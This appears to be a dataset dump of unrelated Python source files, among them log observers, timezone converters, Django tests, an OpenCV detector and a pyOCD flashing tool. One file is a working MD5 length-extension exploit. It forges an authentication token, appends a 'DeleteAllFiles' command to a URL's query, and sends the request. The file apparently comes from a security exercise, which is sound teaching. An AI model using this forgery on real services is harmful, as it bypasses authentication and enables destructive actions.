text stringlengths 38 1.54M |
|---|
import logging
from twisted.python import log
class LevelFileLogObserver(log.FileLogObserver):
    """A twisted FileLogObserver that filters events below a minimum level.

    Events that pass the threshold get the level name prepended to their
    message tuple before being handed to the base observer.
    """

    def __init__(self, file, level=logging.INFO):
        """file: writable file object; level: minimum logging level to emit."""
        log.FileLogObserver.__init__(self, file)
        self.log_level = level

    def emit(self, event_dict):
        """Emit the event only when its severity reaches the threshold."""
        if event_dict['isError']:
            severity = logging.ERROR
        else:
            severity = event_dict.get('level', logging.INFO)
        if severity >= self.log_level:
            event_dict["message"] = (logging.getLevelName(severity),) + event_dict["message"]
            log.FileLogObserver.emit(self, event_dict)
|
#!/usr/bin/python -tt
# -*- coding: utf-8 -*-
import datetime,pytz,types,calendar,time,locale,sys,json
import xml.etree.cElementTree as ET
from argparse import ArgumentParser
def conv_xml(r, ra, num, fecha, entrada):
    """Append an <instant date=... ordinal=...> child element to `r`.

    `ra` and `entrada` are accepted for call-site compatibility but unused.
    """
    attribs = {u"date": str(fecha), u"ordinal": str(num)}
    child = ET.SubElement(r, u"instant")
    child.attrib = attribs
def conv_json(num,fecha):
    """Print a {line_number: date} pair as a JSON object (Python 2 print).

    Tries to strip the trailing ", city" suffix and newline from `fecha`
    before printing; falls back to the raw value if neither is present.
    """
    try:
        # Keep only the text before the comma (drops the city name).
        # NOTE(review): after slicing at the comma the '\n' is usually gone,
        # so the index('\n') below can raise and control falls through to
        # the handlers -- confirm this is the intended flow.
        c=fecha.index(',')
        fecha=fecha[:c]
        fl=fecha.index('\n')
        f=fecha[:fl]
        print json.dumps({num:f})
    except:
        try:
            # no comma: just strip the trailing newline
            fl=fecha.index('\n')
            f=fecha[:fl]
            print json.dumps({num:f})
        except:
            # neither comma nor newline (e.g. an int timestamp)
            fecha=str(fecha)
            print json.dumps({num:fecha})
def trocear_mes(fecha):
    """Return the month (int) from a 'YYYY-MM-DD ...' date string."""
    dash = fecha.index('-')
    return int(fecha[dash + 1:dash + 3])
def trocear_dia(fecha):
    """Return the day of month (int) from a 'YYYY-MM-DD ...' date string."""
    dash = fecha.index('-')
    return int(fecha[dash + 4:dash + 6])
def trocear_hora(fecha):
    """Return the hour (int): the two characters before the first ':'."""
    colon = fecha.index(':')
    return int(fecha[colon - 2:colon])
def trocear_min(fecha):
    """Return the minutes (int): the two characters after the first ':'."""
    colon = fecha.index(':')
    return int(fecha[colon + 1:colon + 3])
def trocear_seg1(fecha):
    """Return the seconds (int) from a time string with NO ', city' suffix.

    Takes everything from 4 chars past the first ':' to the end of the
    string, so any trailing text after the seconds must be whitespace.
    """
    colon = fecha.index(':')
    return int(fecha[colon + 4:])
def trocear_seg2(fecha):
    """Return the seconds (int) from a time string WITH a ', city' suffix."""
    colon = fecha.index(':')
    comma = fecha.index(',')
    return int(fecha[colon + 4:comma])
def trocear_ciudad(fecha):
    """Return the city name: the text between ', ' and the trailing newline."""
    comma = fecha.index(',')
    newline = fecha.index('\n')
    return fecha[comma + 2:newline]
def unix(dt):
    """Return the Unix timestamp (int) of `dt`, read as UTC wall-clock time."""
    return calendar.timegm(dt.utctimetuple())
def calcular_zonas(year,mes,dia,hora,minut,seg,ciudad):
    """Build a timezone-aware datetime for the named city.

    `ciudad` must be one of the capitalised city keys below; like the
    original if/elif chain, an unknown city leaves `dt1` unbound and the
    final return raises UnboundLocalError.
    """
    city_zones = {
        "New_York": pytz.timezone("America/New_York"),
        "Madrid": pytz.timezone("Europe/Madrid"),
        "Moscu": pytz.timezone("Europe/Moscow"),
        "Londres": pytz.timezone("Europe/London"),
        "Tokio": pytz.timezone("Asia/Tokyo"),
        "UTC": pytz.utc,
    }
    if ciudad in city_zones:
        naive = datetime.datetime(year, mes, dia, hora, minut, seg)
        dt1 = city_zones[ciudad].localize(naive)
    return dt1
def intro_ciudad(year,mes,dia,hora,minut,seg,x,cz):
    """Convert the aware datetime `cz` into the timezone named by `x`.

    `x` is a lowercase city key.  The year..seg parameters are accepted for
    call-site compatibility but unused.  Like the original if/elif chain,
    an unknown `x` leaves `tz` unbound and the return raises
    UnboundLocalError.
    """
    city_zones = {
        "madrid": pytz.timezone("Europe/Madrid"),
        "new_york": pytz.timezone("America/New_York"),
        "londres": pytz.timezone("Europe/London"),
        "moscu": pytz.timezone("Europe/Moscow"),
        "tokio": pytz.timezone("Asia/Tokyo"),
        "utc": pytz.utc,
    }
    if x in city_zones:
        tz = cz.astimezone(city_zones[x])
    return tz
def main():
    """Read a file of '<line-number> <date>' lines and print each line's time
    converted per the -t option (XML by default, JSON with -j, text with -a).

    Python 2 script (print statements).  Lines that fail to parse as dates
    are retried as epoch timestamps; anything else aborts the program.
    """
    parser = ArgumentParser()
    parser.add_argument("-t","--timezone",
                        action="store", dest='timezone',
                        help="Muestra por la salida estándar el número de línea y la hora dependiendo del formato que se le pase",
                        default='utc')
    parser.add_argument("-j","--json",
                        action="store_true", dest='json',
                        help="Muestra la salida en formato json")
    parser.add_argument("-a","--ascii",
                        action="store_true", dest='ascii',
                        help="Muestra la salida en texto plano")
    parser.add_argument("fichero", help="Fichero de fechas", metavar="N")
    argumentos=parser.parse_args()
    fin=open (argumentos.fichero,'r')
    at=argumentos.timezone
    # city names accepted for -t (lowercase, except UTC)
    zonas_comandos=["new_york", "madrid", "moscu", "londres", "tokio", "UTC"]
    fmt="%Y-%m-%d %H:%M:%S %Z%z"
    def trocear_year(fecha):
        # Extract the year as an int.  NOTE(review): closure over `num` and
        # `pos` from the loop below; the pos-relative slice assumes the year
        # starts at the beginning of `fecha` -- confirm.
        py=fecha.index('-')
        if num >=10:
            year=fecha[pos-3:py]
        else:
            year=fecha[pos-2:py]
        year=int(year)
        return year
    root = ET.Element(u"instants")
    # the XML root carries the requested city (or 'timestamp' for epoch)
    if argumentos.timezone=='epoch':
        root.attrib={u"city":'timestamp'}
    else:
        root.attrib={u"city":argumentos.timezone}
    for linea in fin:
        try:
            # each line looks like: "<number> <date..., city>"
            pos=linea.index(" ")+1
            num=linea[:pos]
            fecha=linea[pos:]
            num=int(num)
            year=trocear_year(fecha)
            mes=trocear_mes(fecha)
            dia=trocear_dia(fecha)
            hora=trocear_hora(fecha)
            minut=trocear_min(fecha)
            seg=trocear_seg2(fecha)
            ciudad=trocear_ciudad(fecha)
            # epoch output requested
            if at=='epoch':
                dt=calcular_zonas(year,mes,dia,hora,minut,seg,ciudad)
                ut=unix(dt)
                if argumentos.json==False and argumentos.ascii==False: # XML output
                    conv_xml(root, root.attrib,num,ut,'timestamp')
                elif argumentos.json==True: # JSON output
                    conv_json(num,ut)
                else:
                    print num,ut
            # a target city was given on the command line
            if len(sys.argv)>2:
                for x in zonas_comandos:
                    if at==x:
                        dt=calcular_zonas(year,mes,dia,hora,minut,seg,ciudad)
                        tz=intro_ciudad(year,mes,dia,hora,minut,seg,x,dt)
                        if argumentos.json==False and argumentos.ascii==False: # XML output
                            conv_xml(root,root.attrib,num,tz,x)
                        elif argumentos.json==True: # JSON output
                            conv_json(num,tz)
                        else:
                            print num,tz
            # no options at all: default to UTC plain-text output
            if len(sys.argv)<3:
                dt=calcular_zonas(year,mes,dia,hora,minut,seg,ciudad)
                utc=pytz.utc
                tz=dt.astimezone(utc)
                print num,tz
        except ValueError:
            # line did not parse as a date: retry it as an epoch timestamp
            try:
                finl=fecha.index('\n')
                timst=fecha[:finl]
                timst=int(timst)
                # epoch requested: echo the timestamp unchanged
                if at=='epoch':
                    if argumentos.json==False and argumentos.ascii==False: # XML output
                        conv_xml(root,root.attrib,num,timst,'timestamp')
                    elif argumentos.json==True: # JSON output
                        conv_json(num,timst)
                    else:
                        print num,timst
                # a target city was given on the command line
                if len(sys.argv)>2:
                    for x in zonas_comandos:
                        if at==x:
                            # epoch -> formatted UTC string, re-split, then
                            # localized into the requested timezone
                            tiimst=datetime.datetime.utcfromtimestamp(timst)
                            tiimst=tiimst.strftime(fmt)
                            year=trocear_year(tiimst)
                            mes=trocear_mes(tiimst)
                            dia=trocear_dia(tiimst)
                            hora=trocear_hora(tiimst)
                            minut=trocear_min(tiimst)
                            seg=trocear_seg1(tiimst)
                            cz=calcular_zonas(year,mes,dia,hora,minut,seg,"UTC")
                            tz=intro_ciudad(year,mes,dia,hora,minut,seg,x,cz)
                            if argumentos.json==False and argumentos.ascii==False: # XML output
                                conv_xml(root,root.attrib,num,tz,x)
                            elif argumentos.json==True: # JSON output
                                conv_json(num,tz)
                            else:
                                print num,tz
                # no options at all: default to UTC plain-text output
                if len(sys.argv)<3:
                    tiimst=datetime.datetime.utcfromtimestamp(timst)
                    tiimst=tiimst.strftime(fmt)
                    year=trocear_year(tiimst)
                    mes=trocear_mes(tiimst)
                    dia=trocear_dia(tiimst)
                    hora=trocear_hora(tiimst)
                    minut=trocear_min(tiimst)
                    seg=trocear_seg1(tiimst)
                    cz=calcular_zonas(year,mes,dia,hora,minut,seg,"UTC")
                    utc=pytz.utc
                    tz=cz.astimezone(utc)
                    print num,tz
            except ValueError:
                # neither a date nor a timestamp: abort
                print 'Linea incorrecta'
                raise SystemExit
    # dump the accumulated XML document unless JSON/ASCII (or no args) was used
    if argumentos.json==False and argumentos.ascii==False and len(sys.argv)!=2 : # XML output
        print ET.tostring(root, encoding="utf-8",method="xml")
    fin.close()
if __name__ == "__main__":
main()
|
units_digit = ['','one','two','three','four','five','six','seven','eight','nine']
# Fix: 'fourty' -> 'forty' (standard English spelling)
tens_digit = ['','ten','twenty','thirty','forty','fifty','sixty','seventy','eighty','ninety']
def reading(number):
    """Return (tens_word, units_word) for an integer 0-99.

    Fixes over the original: corrected 'forty' spelling, and single-digit
    numbers no longer raise IndexError (the number is zero-padded to two
    digits before the digits are split).
    """
    digits = str(number).zfill(2)
    tens = int(digits[0])
    unit = int(digits[1])
    return tens_digit[tens], units_digit[unit]
print(reading(46))
|
from pymd5 import md5, padding
import httplib, urlparse, sys
import urllib
# MD5 length-extension attack (Python 2 script): forge a valid token for a
# URL whose token = MD5(secret || query-without-token), then append a new
# command parameter without knowing the secret.
url = sys.argv[1]
parsedUrl = urlparse.urlparse(url)
# split the query string into a {key: value} dict
params = {}
for x in parsedUrl.query.split('&'):
    y = x.split('=')
    params.update({ y[0] : y[1] })
# the digest the server computed over secret||message
originalMessageHash = params['token']
# m = the query string with the token parameter removed
m = parsedUrl.query.replace('token=' + params['token'], '')
if m[0] == '&':
    m = m[1:]
# +8 accounts for the server-side secret prepended to the message
# NOTE(review): assumes the secret is 8 bytes long -- confirm
m_len = len(m) + 8
# the MD5 padding of the original message, URL-encoded for the query string
pad = urllib.quote(padding(m_len * 8))
# total bits hashed so far (message + padding), to resume the MD5 state
bits = (m_len + len(padding(m_len*8)))*8
# resume MD5 from the leaked digest and extend it with the new suffix
h = md5(state=originalMessageHash.decode('hex'), count=bits)
suffix = '&command3=DeleteAllFiles'
h.update(suffix)
# rebuild the URL: forged token + original params + padding + appended command
newUrl = '{scheme}://{netloc}{path}?token={token}&{params}{pad}{suffix}'.format(
    scheme=parsedUrl.scheme, netloc=parsedUrl.netloc, path=parsedUrl.path,
    token=h.hexdigest(), params=m, pad=pad, suffix=suffix)
parsedUrl = urlparse.urlparse(newUrl)
print 'URL:', newUrl
conn = httplib.HTTPSConnection(parsedUrl.hostname)
conn.request('GET', parsedUrl.path + '?' + parsedUrl.query)
print conn.getresponse().read()
|
#!/usr/bin/env python
#
# Copyright (C) 2019 FIBO/KMUTT
# Written by Nasrun (NeverHoliday) Hayeeyama
#
VERSIONNUMBER = 'v1.0'
PROGRAM_DESCRIPTION = "Test detect multiscale"
########################################################
#
# STANDARD IMPORTS
#
import sys
import os
import optparse
########################################################
#
# LOCAL IMPORTS
#
import cv2
import numpy as np
import pickle
import sklearn
import time
########################################################
#
# Standard globals
#
NUM_REQUIRE_ARGUMENT = 2
########################################################
#
# Program specific globals
#
########################################################
#
# Helper functions
#
def loadPickle( picklePathStr ):
    """Load and return the object pickled in the file at `picklePathStr`.

    Fix: the file is opened in binary mode ('rb') -- pickle data is binary,
    and opening it in text mode breaks on Python 3 (and can corrupt reads
    on platforms with newline translation).
    """
    with open( picklePathStr, 'rb' ) as f:
        obj = pickle.load( f )
    return obj
########################################################
#
# Class definitions
#
########################################################
#
# Function bodies
#
########################################################
#
# main
#
def main():
    """Slide a 40x40 window over a pyramid-downscaled copy of the input
    image, score each crop with a HOG feature + pickled sklearn classifier,
    and visualise the scan.  Python 2 script (print statements).

    Usage: python script.py [imagePathStr] [modelPath]
    """
    # define usage of programing
    programUsage = "python %prog arg [option] {} ".format( '[imagePathStr] [modelPath]' ) + str( VERSIONNUMBER ) + ', Copyright (C) 2019 FIBO/KMUTT'
    # initial parser instance
    parser = optparse.OptionParser( usage = programUsage, description=PROGRAM_DESCRIPTION )
    # add option of main script
    parser.add_option( "-o", "--myOption", dest = "myOption",
                       help = "Specify option document here." )
    # add option
    ( options, args ) = parser.parse_args()
    # check number of argument from NUM_REQUIRE_ARGUMENT
    if len( args ) != NUM_REQUIRE_ARGUMENT:
        # raise error from parser
        parser.error( "require {} argument(s)".format( NUM_REQUIRE_ARGUMENT ) )
    # get image path and model path
    imagePathStr = args[ 0 ]
    modelPathStr = args[ 1 ]
    # initial extractor: 40x40 window, 8x8 block, 4x4 block stride, 4x4 cell, 9 bins
    hog = cv2.HOGDescriptor( ( 40, 40 ), ( 8, 8 ), ( 4, 4 ), ( 4, 4 ), 9 )
    # initial model
    model = loadPickle( modelPathStr )
    # initial image windows
    cv2.namedWindow( 'img', cv2.WINDOW_NORMAL )
    cv2.namedWindow( 'resultImage', cv2.WINDOW_NORMAL )
    cv2.namedWindow( 'cropImage', cv2.WINDOW_NORMAL )
    # load image and build a 3-level pyramid; only the final (1/4-scale)
    # level is kept in scaleImage
    img = cv2.imread( imagePathStr )
    for i in range( 3 ):
        if i == 0:
            scaleImage = img.copy()
        else:
            scaleImage = cv2.pyrDown( scaleImage )
        print "image dimension : {}, {}".format( img.shape[ 1 ], img.shape[ 0 ] )
    # initial bounding box
    boundingBox = ( 40, 40 )
    # for visualize
    visualizeImage = scaleImage.copy()
    # initial bounding list (unused)
    boundingList = list()
    # slide the window over the downscaled image in 20-px steps
    for lly in xrange( 0, scaleImage.shape[ 0 ] - boundingBox[ 1 ], 20 ):
        for llx in xrange( 0, scaleImage.shape[ 1 ] - boundingBox[ 0 ], 20 ):
            cv2.rectangle( visualizeImage, ( llx, lly ), ( llx + boundingBox[ 0 ], lly + boundingBox[ 1 ] ), ( 255, 0, 0 ), 2 )
            # NOTE(review): crops from the full-resolution `img` using
            # coordinates computed on `scaleImage` -- looks like it should be
            # scaleImage[...]; confirm.
            cropImage = img[ lly : lly + boundingBox[ 1 ], llx : llx + boundingBox[ 0 ] ].copy()
            featureVector = hog.compute( cropImage )
            featureVector = featureVector.T
            # probability of the positive class
            classificationScore = model.predict_proba( featureVector )[ 0, 1 ]
            if classificationScore > 0.5:
                print "At ( {}, {} ) score : {}".format( llx, lly, classificationScore )
                #
                # cv2.rectangle( img, ( llx, lly ), ( llx + boundingBox[ 0 ], lly + boundingBox[ 1 ] ), ( 0, 0, 255 ), 2 )
            cv2.imshow( 'img', visualizeImage )
            cv2.imshow( 'resultImage', img )
            cv2.imshow( 'cropImage', cropImage )
            cv2.waitKey( 1 )
            time.sleep( 0.015 )
        # reset the overlay for the next row
        visualizeImage = scaleImage.copy()
    # final display; wait for a keypress before tearing windows down
    cv2.imshow( 'img', visualizeImage )
    cv2.imshow( 'resultImage', img )
    cv2.imshow( 'cropImage', cropImage )
    cv2.waitKey( 0 )
    cv2.destroyAllWindows()
########################################################
#
# call main
#
if __name__=='__main__':
main()
|
from filter import ImageHolder
import multiprocessing
import os
IMAGE_DIR = "images"
if __name__ == "__main__":
    # Spawn one worker process per image file and apply the filters to each.
    print("Virtual cores:", multiprocessing.cpu_count())
    ImH = ImageHolder()
    processes = []
    for i, filename in enumerate(os.listdir(IMAGE_DIR)):
        processes += [multiprocessing.Process(target=ImH.apply_filters, args=(IMAGE_DIR + '/' + filename,))]
    # NOTE(review): `processes_run` and `stack` are never used, and the
    # started processes are never join()ed -- the parent may exit before
    # the workers finish.  Confirm whether a join loop is missing.
    processes_run = []
    stack = []
    for proc in processes:
        proc.start()
|
# "venkatesh"
# "vhesnekta"
# Build s1 by interleaving characters from the front and back of s:
# s[0], s[-1], s[1], s[-2], ... (middle char last for odd lengths).
# Fix: the original inner loop computed p = l - j with j always equal to l,
# so it appended s[0] every time and never produced the documented output.
s="venkat"
s1=""
l=len(s)-1
i, j = 0, l
while i < j:
    s1 = s1 + s[i] + s[j]
    i += 1
    j -= 1
if i == j:          # odd length: one middle character remains
    s1 = s1 + s[i]
print(s1)
|
from .file_utilities import *
from .math_utilities import *
from .plot_utilities import *
from .data_utilities import *
|
# Generated by Django 2.0.5 on 2018-07-07 18:37
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drop UserModel.name, resize DebtModel.amount, and add lookup indexes."""

    dependencies = [
        ('server_alpha_app', '0001_initial'),
    ]
    operations = [
        # UserModel no longer stores a display name
        migrations.RemoveField(
            model_name='usermodel',
            name='name',
        ),
        # amounts capped at 999.99 (5 digits, 2 decimal places)
        migrations.AlterField(
            model_name='debtmodel',
            name='amount',
            field=models.DecimalField(decimal_places=2, max_digits=5),
        ),
        # indexes for the common lookup columns
        migrations.AddIndex(
            model_name='customermodel',
            index=models.Index(fields=['cpf'], name='cpf_idx'),
        ),
        migrations.AddIndex(
            model_name='debtmodel',
            index=models.Index(fields=['customer'], name='customer_idx'),
        ),
        migrations.AddIndex(
            model_name='usermodel',
            index=models.Index(fields=['username'], name='username_idx'),
        ),
    ]
|
# find the last element of a list
# use python's built in list indexing with a special case for an empty list
# note: I believe cpython keeps track of a list's length for quick lookup so
# len() does not require a traversal, only field lookup, but I should
# find where that's spelled out or write a test to prove it...
def last(l):
    """Return the final element of *l*, or None when *l* is empty."""
    return l[-1] if l else None
from hypothesis import given
import hypothesis.strategies as st
def test_last():
    """Spot-check last() on mixed, homogeneous and empty lists."""
    cases = [
        ([1, 2, 3], 3),
        ([1, 'a', 'b'], 'b'),
        ([], None),
    ]
    for seq, expected in cases:
        assert last(seq) == expected
@given(st.lists(elements=st.integers()))
def test_hyp(l):
    """Property test: last() agrees with l[-1] (None for the empty list)."""
    expected = l[-1] if l else None
    assert last(l) == expected
|
######################
### Custom Imports ###
######################
from . import commands
from . import settings
######################
def start():
    """Show the welcome banner, then collect the player and ship names
    before entering the game's command loop."""
    banner = """
*--------------------------------*
Welcome to Space Exploration Game
coded in Py3.7
By: DrProfMaui
*--------------------------------*
"""
    print(banner)
    settings.setname()
    settings.setshipname()
    commands.command()
"""Tile."""
class Tile:
    """A single map tile: a sprite plus terrain flags and dynamic occupants."""

    def __init__(self, sprite, solid=False, high=False, mask=None, slow=False):
        """Constructor.

        sprite: the tile's image.
        solid/high/slow: terrain flags -- presumably collision, elevation
            and movement-penalty markers; confirm against the map code.
        mask: optional collision mask (None = none).
        """
        self.sprite = sprite
        self.mask = mask
        self.solid = solid
        self.high = high
        self.slow = slow
        # NOTE(review): this assigns the *builtin* `type` function -- there is
        # no `type` parameter to this constructor, so this looks like a bug
        # (probably a missing constructor argument).  Left unchanged.
        self.type = type
        self.is_building = None
        self.mobs = []          # mobs currently standing on this tile
        self.projectiles = []   # projectiles currently over this tile
        self.building = None
|
'''
Write a python program that it should consist of special char, numbers and chars .
if there are even numbers of special chars
Then 1) the series should start with even followed by odd
Input: t9@a42&516
Output: 492561
If there are odd numbers of special chars then the output will be starting with odd followed by even
Input:5u6@25g7#@
Output:56527
If there are any number of additional digits append them at last
'''
import re

# Interleave the even and odd digits of `st`: even digits first when the
# number of special characters is even, odd digits first otherwise.
# Fix: per the spec above, leftover unpaired digits are appended at the end
# (the original zip() silently truncated them).
l=[]
st='t9@a42&516'
n=list(map(int,re.findall('[0-9]',st)))            # digits, in order
e=list(filter(lambda x: x%2==0,n))                 # even digits
o=list(filter(lambda x: x%2!=0,n))                 # odd digits
specials = re.sub(r'[\w]','',st)                   # non-word chars only
if len(specials)%2==0:
    first, second = e, o
else:
    first, second = o, e
for pair in zip(first, second):
    l.extend(pair)
# append any unpaired leftover digits at the end
paired = min(len(first), len(second))
l.extend(first[paired:])
l.extend(second[paired:])
print(''.join(map(str,l)))
from django.test import TestCase
from api.models import (
Company,
DeviceModel,
Device,
)
from rest_framework.test import APIClient
from rest_framework import status
from django.urls import reverse
class CompanyViewTestCase(TestCase):
    """Test suite for the company api views.

    Fix: the deprecated unittest alias assertEquals is replaced with
    assertEqual (removed in Python 3.12); also corrected a copy-pasted
    docstring on the read test.
    """

    def setUp(self):
        """Define the test client and other test variables."""
        self.client = APIClient()
        self.company_data = {'name': 'Apple'}
        self.response = self.client.post(
            reverse('create_company'),
            self.company_data,
            format="json")

    def test_api_can_create_a_company(self):
        """Test the api has company creation capability."""
        self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)

    def test_api_can_read_a_company(self):
        """Test the api has company read capability."""
        company = Company.objects.get()
        response = self.client.get(
            reverse('details',
                    kwargs={'pk': company.id}), format="json")
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertContains(response, company)

    def test_api_can_update_company(self):
        """Test the api can update a given company."""
        company = Company.objects.get()
        change_company = {'name': 'Something new'}
        res = self.client.put(
            reverse('details', kwargs={'pk': company.id}),
            change_company, format='json'
        )
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_api_cannot_update_when_not_company(self):
        """Test the api cannot update a company that does not exist."""
        change_company = {'name': 'Something new'}
        res = self.client.put(
            reverse('details', kwargs={'pk': 9999}),
            change_company, format='json'
        )
        self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)

    def test_api_can_delete_company(self):
        """Test the api can delete a company."""
        company = Company.objects.get()
        response = self.client.delete(
            reverse('details', kwargs={'pk': company.id}),
            format='json',
            follow=True)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
class DeviceModelViewTestCase(TestCase):
    """Test suite for the device model api views."""

    def create_company(self, name="Apple"):
        # helper: persist and return a Company row
        return Company.objects.create(name=name)

    def setUp(self):
        """Define the test client and other test variables."""
        self.client = APIClient()
        self.device_model_data = {
            'name' : 'iPhone 3GS',
            'release_year': 2010,
            'device_type' : DeviceModel.TYPE_SMARTPHONE,
            'company_id' : self.create_company().id
        }
        self.response = self.client.post(
            reverse('create_device_model'),
            self.device_model_data,
            format="json")

    def test_api_can_create_a_device_model(self):
        """Test the api has device model creation capability."""
        self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
class DeviceViewTestCase(TestCase):
    """Test suite for the device api views.

    Fixes: the `company` parameter of create_device_model was accepted but
    silently ignored (always overwritten with a new company); the deprecated
    unittest alias assertEquals is replaced with assertEqual.
    """

    def create_company(self, name="Apple"):
        # helper: persist and return a Company row
        return Company.objects.create(name=name)

    def create_device_model(self, name="iPhone 3GS", release_year=2000, company=None):
        # Respect an explicitly supplied company; create a fresh one otherwise.
        if company is None:
            company = self.create_company()
        return DeviceModel.objects.create(name=name, release_year=release_year, company=company)

    def setUp(self):
        """Define the test client and other test variables."""
        self.client = APIClient()
        self.device_data = {
            'device_model_id' : self.create_device_model().id,
            'capacity' : 32,
            'color' : 'White',
            'os_version' : 'iOS 7'
        }
        self.response = self.client.post(
            reverse('create_device'),
            self.device_data,
            format="json")

    def test_api_can_create_a_device(self):
        """Test the api has device creation capability."""
        self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)

    def test_api_can_read_a_device(self):
        """Test the api has device read capability."""
        device = Device.objects.get()
        response = self.client.get(
            reverse('device_details',
                    kwargs={'pk': device.id}), format="json")
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_api_can_update_device(self):
        """Test the api can update a given device."""
        device = Device.objects.get()
        change_device = self.device_data
        change_device['capacity'] = 64
        res = self.client.put(
            reverse('device_details', kwargs={'pk': device.id}),
            change_device, format='json'
        )
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_api_can_delete_a_device(self):
        """Test the api can delete a device."""
        device = Device.objects.get()
        response = self.client.delete(
            reverse('device_details', kwargs={'pk': device.id}),
            format='json',
            follow=True)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
|
#!/usr/bin/env python3
from __future__ import print_function
import errno
import sys
import logging
from pyocd.core.helpers import ConnectHelper
from pyocd.flash.file_programmer import FileProgrammer
from pyocd.flash.eraser import FlashEraser
from binho.utils import log_silent, log_verbose
from binho.errors import DeviceNotFoundError
from binho.utils import binhoArgumentParser
def main():
    """Flash firmware to a target MCU through a Binho adapter in DAPLink mode.

    Finds the adapter, verifies it is in DAPLink mode, then uses pyOCD to
    optionally chip-erase, program a binary file, and/or reset the target.

    Fix: the "not in DAPLink mode" message contained a format placeholder
    that was never filled in -- the original printed a literal "{}".
    """
    # Set up a simple argument parser.
    parser = binhoArgumentParser(
        description="utility for using supported Binho host adapters in DAPLink mode to flash code to MCUs"
    )
    parser.add_argument("-t", "--target", default=None, help="Manufacturer part number of target device")
    parser.add_argument("-f", "--file", default=None, help="Path to binary file to program")
    parser.add_argument(
        "-e", "--erase", action="store_true", help="Perform chip-erase before programming",
    )
    parser.add_argument(
        "-r", "--reset", action="store_true", help="Reset the device after programming completes",
    )
    args = parser.parse_args()
    log_function = log_verbose if args.verbose else log_silent
    log_function("Checking for pyOCD...")
    try:
        import pyocd  # pylint: disable=import-outside-toplevel
    except ModuleNotFoundError:
        print("PyOCD must be installed for this to work. Use 'pip install pyocd' to install the module.")
        sys.exit(1)
    log_function("pyOCD installation confirmed!")
    try:
        log_function("Trying to find a Binho host adapter...")
        device = parser.find_specified_device()
        if device.inDAPLinkMode:
            log_function(
                "{} found on {} in DAPLink mode (Device ID: {})".format(
                    device.productName, device.commPort, device.deviceID
                )
            )
        else:
            log_function("{} found on {}. (Device ID: {})".format(device.productName, device.commPort, device.deviceID))
            # Fix: fill in the placeholder (the original printed "{}" literally).
            print("The {} is not in DAPLink mode. Please use the 'binho daplink' command ".format(device.productName))
            sys.exit(errno.ENODEV)
    except DeviceNotFoundError:
        if args.serial:
            print(
                "No Binho host adapter found matching Device ID '{}'.".format(args.serial), file=sys.stderr,
            )
        else:
            print("No Binho host adapter found!", file=sys.stderr)
        sys.exit(errno.ENODEV)
    # if we fail before here, no connection to the device was opened yet.
    # however, if we fail after this point, we need to make sure we don't
    # leave the serial port open.
    try:
        if not args.file and not (args.erase or args.reset):
            print("No binary file to program was supplied.")
            sys.exit(1)
        # default pyOCD settings; overridden by the -e/-t flags below
        erase_setting = "auto"
        target_override = "cortex_m"
        if args.erase:
            erase_setting = "chip"
        if args.target:
            target_override = args.target
        if args.verbose:
            logging.basicConfig(level=logging.INFO)
        else:
            logging.basicConfig(level=logging.WARNING)
        with ConnectHelper.session_with_chosen_probe(
            target_override=target_override, chip_erase=erase_setting, smart_flash="false",
        ) as session:
            board = session.board
            target = board.target
            print("Vendor: {}\tPart Number: {}".format(target.vendor, target.part_number))
            if args.erase:
                eraser = FlashEraser(session, FlashEraser.Mode.CHIP)
                eraser.erase()
                print("{} erased".format(target.part_number))
            if args.file:
                FileProgrammer(session).program(args.file)
                log_function("Target {} programmed with {}".format(target.part_number, args.file))
            if args.reset:
                target.reset()
                print("Target {} reset".format(target.part_number))
    except pyocd.core.exceptions.TransferError:
        print(
            "Problem communicating with the target MCU. Please make sure SWDIO, SWCLK, and GND are properly "
            " connected and the MCU is powered up."
        )
    finally:
        # close the connection to the host adapter
        device.close()
if __name__ == "__main__":
main()
|
import sys
#sys.path.append(
# '/home/jbs/develop.old/articles/201509_python_exercises_generator')
#sys.path.append('/home/jbs/develop/201902_questions_transformer')
sys.path.append('../qom_questions_transformer')
import string
from random import sample
from random import choice
from random import randint
from random import shuffle
from string import ascii_letters
from text_transformer.tt_text_transformer_interface import add_changeable
#from text_transformer.tt_text_transformer_interface import change_all_occurrences
from text_transformer.tt_text_transformer_interface import change_one_occurrence
# # this import removes an import error. I don't know why (jbs
# # 2018/12/12). see pt_import_tests.py and try to correct the problem.
# import py_transformer.ast_processor
# from python_transformer.pt_python_transformer_interface import change_identifier_all_occurrences
# from python_transformer.pt_python_transformer_interface import change_all_occurrences_in_strings
from python_transformer.pt_python_transformer_interface import change_token_all_occurrences
from python_transformer.pt_python_transformer_interface import change_all_occurrences
#from sympy import latex, sympify
# in the question (program)
add_changeable('135') # seed
add_changeable('a') # the list
add_changeable('n') # the loop variable
add_changeable('x') # the loop variable
add_changeable('d') # the dictionary variable
add_changeable('dic') # the dictionary class variable
add_changeable('str_a') # the list of strings
add_changeable('int_a') # the list of ints
add_changeable('13') # the list length
add_changeable('3') # the min int value
add_changeable('33') # the max int value
# answers list name
add_changeable(r'\verb+a+')
# answers object dictionary class name
add_changeable(r'\verb+dic+')
# answers object dictionary class val
add_changeable(r'\verb+dic_val+')
# answer new val to add to object dectionary class
add_changeable(r'\verb+add_val+')
# answers dictionary name
add_changeable(r'\verb+d+')
# answers (indexes)
add_changeable(r'\verb+1+')
add_changeable(r'\verb+2+')
add_changeable(r'\verb+3+')
add_changeable(r'\verb+4+')
add_changeable(r'\verb+4_t+')
add_changeable(r'\verb+4_f+')
add_changeable(r'\verb+5+')
# right answers values
add_changeable(r'\verb+11_1+')
add_changeable(r'\verb+11_2+')
add_changeable(r'\verb+22+')
add_changeable(r'\verb+33+')
add_changeable(r'\verb+44+')
add_changeable(r'\verb+55+')
# wrong answers values
add_changeable(r'\verb+111_1+')
add_changeable(r'\verb+111_2+')
add_changeable(r'\verb+222+')
add_changeable(r'\verb+333+')
add_changeable(r'\verb+444+')
add_changeable(r'\verb+555+')
# variáveis partilhas entre as funções make_transformations e
# make_transformations_on_results
a = None
